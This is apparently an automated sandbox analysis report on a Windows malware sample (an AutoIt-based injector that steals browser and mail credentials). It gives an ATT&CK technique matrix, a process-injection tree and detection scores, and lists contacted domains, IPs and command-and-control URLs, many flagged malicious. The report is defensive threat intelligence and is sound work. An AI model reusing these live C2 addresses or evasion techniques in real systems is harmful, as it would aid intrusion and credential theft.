                Source: Yara match; File source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 21 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 116 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 141 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 412 Process Injection | 2 Valid Accounts | LSA Secrets | 2 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 412 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Behavior Graph ID: 1587354, Sample: 1162-201.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100

                • Contacted: www.laduta.xyz; www.explorevision.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
                • Sample signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures
                • 1162-201.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                  • svchost.exe (started by 1162-201.exe): Maps a DLL or memory area into another process
                    • OtAlYRopPg.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                      • chkntfs.exe (started by OtAlYRopPg.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        • OtAlYRopPg.exe (injected by chkntfs.exe): Found direct / indirect Syscall (likely to bypass EDR); contacts www.ripbgs.info 47.83.1.90 (ports 49992, 49993, 49994; VODANETInternationalIP-BackboneofVodafoneDE, United States), itcomp.store 103.247.11.204 (ports 50015, 50016, 50017; RUMAHWEB-AS-IDRumahwebIndonesiaCVID, Indonesia) and 10 other IPs or domains
                        • firefox.exe (started by chkntfs.exe)

                Source | Detection | Scanner | Label | Link
                1162-201.exe | 36% | Virustotal | | Browse
                1162-201.exe | 58% | ReversingLabs | Win32.Trojan.AutoitInject |
                1162-201.exe | 100% | Avira | DR/AutoIt.Gen8 |
                1162-201.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.einpisalpace.shop/pgw3/ | 0% | Avira URL Cloud | safe |
                http://www.mzkd6gp5.top/utww/ | 0% | Avira URL Cloud | safe |
                http://www.liuhuazhibo.net | 0% | Avira URL Cloud | safe |
                http://www.oshwal.net | 0% | Avira URL Cloud | safe |
                http://www.maituzhibo.com | 0% | Avira URL Cloud | safe |
                http://www.zhonglangzhibo.net | 0% | Avira URL Cloud | safe |
                https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl | 0% | Avira URL Cloud | safe |
                http://www.liufangzhibo.com | 0% | Avira URL Cloud | safe |
                http://www.jiuyuezhibo.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX | 0% | Avira URL Cloud | safe |
                http://www.yundouzhibo.net | 0% | Avira URL Cloud | safe |
                http://www.medicalink.net | 0% | Avira URL Cloud | safe |
                http://www.lovemarketing.net | 0% | Avira URL Cloud | safe |
                http://www.elecsa.net | 0% | Avira URL Cloud | safe |
                http://www.qimiaozhibo.com | 0% | Avira URL Cloud | safe |
                http://www.wuyezhibo.com | 0% | Avira URL Cloud | safe |
                http://www.maskmakers.net | 0% | Avira URL Cloud | safe |
                http://www.xiaomiaozhibo.net | 0% | Avira URL Cloud | safe |
                http://einpisalpace.shop/ | 0% | Avira URL Cloud | safe |
                http://www.banditi.net | 0% | Avira URL Cloud | safe |
                http://www.68markavenue.net | 0% | Avira URL Cloud | safe |
                http://www.eventsmedia.net | 0% | Avira URL Cloud | safe |
                https://white.anva.org.cn/ | 0% | Avira URL Cloud | safe |
                http://www.overlayoasis.quest | 0% | Avira URL Cloud | safe |
                http://www.welovebeauty.net | 0% | Avira URL Cloud | safe |
                http://www.nuoyunzhibo.com | 0% | Avira URL Cloud | safe |
                http://www.agrobazar.net | 0% | Avira URL Cloud | safe |
                http://www.hairdeluxe.net | 0% | Avira URL Cloud | safe |
                http://www.legalvideos.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/wn9b/ | 0% | Avira URL Cloud | safe |
                http://www.xunaizhibo.com/binding | 0% | Avira URL Cloud | safe |
                http://www.perfectpint.net | 0% | Avira URL Cloud | safe |
                https://zzlz.gsxt.gov.cn/ | 0% | Avira URL Cloud | safe |
                http://www.huayuzhibo.net | 0% | Avira URL Cloud | safe |
                http://www.theflowerpot.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.legalstrategy.net | 0% | Avira URL Cloud | safe |
                http://www.rsbi.net | 0% | Avira URL Cloud | safe |
                http://www.wuyezhibo.net | 0% | Avira URL Cloud | safe |
                http://www.chuncaozhibo.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png | 0% | Avira URL Cloud | safe |
                http://www.implantcentre.net | 0% | Avira URL Cloud | safe |
                http://www.xingyuanzhibo.net | 0% | Avira URL Cloud | safe |
                http://www.itcomp.store/h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX | 0% | Avira URL Cloud | safe |
                http://www.easygram.net | 0% | Avira URL Cloud | safe |
                http://www.qinglizhibo.net | 0% | Avira URL Cloud | safe |
                http://www.yanyuzhibo.com | 0% | Avira URL Cloud | safe |
                http://www.liangmeizhibo.net | 0% | Avira URL Cloud | safe |
                http://www.mynewshub.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js | 0% | Avira URL Cloud | safe |
                http://www.startuptalent.net | 0% | Avira URL Cloud | safe |
                http://www.lovevintage.net | 0% | Avira URL Cloud | safe |
                http://www.gotogermany.net | 0% | Avira URL Cloud | safe |
                http://www.100millionjobs.africa/oqj2/ | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d | 0% | Avira URL Cloud | safe |
                http://www.hiload.net | 0% | Avira URL Cloud | safe |
                http://www.infovea.tech/s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= | 0% | Avira URL Cloud | safe |
                http://www.biomedika.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png | 0% | Avira URL Cloud | safe |
                http://www.luxbrand.net | 0% | Avira URL Cloud | safe |
                http://www.happystories.net | 0% | Avira URL Cloud | safe |
                http://www.athousandwords.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.yanyangzhibo.com | 0% | Avira URL Cloud | safe |
                http://www.bodyonline.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/js.js | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb | 0% | Avira URL Cloud | safe |
                http://www.losbravos.net | 0% | Avira URL Cloud | safe |
                http://www.methlab.net | 0% | Avira URL Cloud | safe |
                http://www.megaos.net | 0% | Avira URL Cloud | safe |
                http://www.allprinting.net | 0% | Avira URL Cloud | safe |
                http://www.qiyuezhibo.net | 0% | Avira URL Cloud | safe |
                http://www.miaozhaozhibo.net | 0% | Avira URL Cloud | safe |
                http://www.huoyazhibo.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js | 0% | Avira URL Cloud | safe |
                http://www.electrocat.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.naikuaizhibo.com | 0% | Avira URL Cloud | safe |
                http://www.implantcentre.net/binding | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg | 0% | Avira URL Cloud | safe |
                http://www.anmozhibo.net | 0% | Avira URL Cloud | safe |
                http://www.liguizhibo.net | 0% | Avira URL Cloud | safe |
                http://www.einpisalpace.shop/pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= | 0% | Avira URL Cloud | safe |
                http://www.qilinzhibo.net | 0% | Avira URL Cloud | safe |
                http://www.overlayoasis.quest/ufm5/ | 0% | Avira URL Cloud | safe |
                http://www.aguardiente.net | 0% | Avira URL Cloud | safe |
                http://www.xiapizhibo.net | 0% | Avira URL Cloud | safe |
                http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js | 0% | Avira URL Cloud | safe |
                http://www.eurosupport.net | 0% | Avira URL Cloud | safe |
                http://www.kleenair.net | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.laduta.xyz | 192.64.119.109 | true | true | | unknown
                www.babyzhibo.net | 192.186.58.31 | true | true | | unknown
                www.potorooqr.lol | 127.0.0.1 | true | false | | unknown
                url.gname.net | 172.65.235.97 | true | false | | high
                infovea.tech | 76.223.67.189 | true | true | | unknown
                www.einpisalpace.shop | 188.114.96.3 | true | true | | unknown
                www.explorevision.xyz | 162.0.236.169 | true | true | | unknown
                itcomp.store | 103.247.11.204 | true | true | | unknown
                www.mzkd6gp5.top | 104.21.64.1 | true | true | | unknown
                100millionjobs.africa | 136.243.64.147 | true | true | | unknown
                www.overlayoasis.quest | 172.67.148.216 | true | true | | unknown
                www.ripbgs.info | 47.83.1.90 | true | true | | unknown
                www.itcomp.store | unknown | unknown | false | | unknown
                www.glyttera.shop | unknown | unknown | false | | unknown
                www.kx22368.shop | unknown | unknown | false | | unknown
                www.100millionjobs.africa | unknown | unknown | false | | unknown
                www.infovea.tech | unknown | unknown | false | | unknown
                www.0303588a47.buzz | unknown | unknown | false | | unknown
                www.tizzles.tech | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.mzkd6gp5.top/utww/ | true | Avira URL Cloud: safe | unknown
                http://www.einpisalpace.shop/pgw3/ | true | Avira URL Cloud: safe | unknown
                http://www.babyzhibo.net/wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX | true | Avira URL Cloud: safe | unknown
                http://www.babyzhibo.net/wn9b/ | true | Avira URL Cloud: safe | unknown
                http://www.itcomp.store/h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX | true | Avira URL Cloud: safe | unknown
                http://www.infovea.tech/s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= | true | Avira URL Cloud: safe | unknown
                http://www.100millionjobs.africa/oqj2/ | true | Avira URL Cloud: safe | unknown
                http://www.einpisalpace.shop/pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= | true | Avira URL Cloud: safe | unknown
                http://www.overlayoasis.quest/ufm5/ | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://www.12377.cn/ | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://beian.miit.gov.cn/#/Integrated/index | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.jiuyuezhibo.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.maituzhibo.com | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/ac/?q= | chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://push.zhanzhang.baidu.com/push.js | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | | high
                http://www.oshwal.net | OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.zhonglangzhibo.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.liuhuazhibo.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl | OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003386000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.liufangzhibo.com | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.qimiaozhibo.com | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.elecsa.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.medicalink.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.lovemarketing.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.yundouzhibo.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.maskmakers.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.xiaomiaozhibo.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://einpisalpace.shop/ | OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003518000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.wuyezhibo.com | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.banditi.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.eventsmedia.net | chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe |
                                                                unknown
                                                                http://www.68markavenue.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.overlayoasis.questOtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://white.anva.org.cn/chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.nuoyunzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.welovebeauty.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.agrobazar.netOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.hairdeluxe.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.legalvideos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.xunaizhibo.com/bindingchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.perfectpint.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://zzlz.gsxt.gov.cn/chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.huayuzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.theflowerpot.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
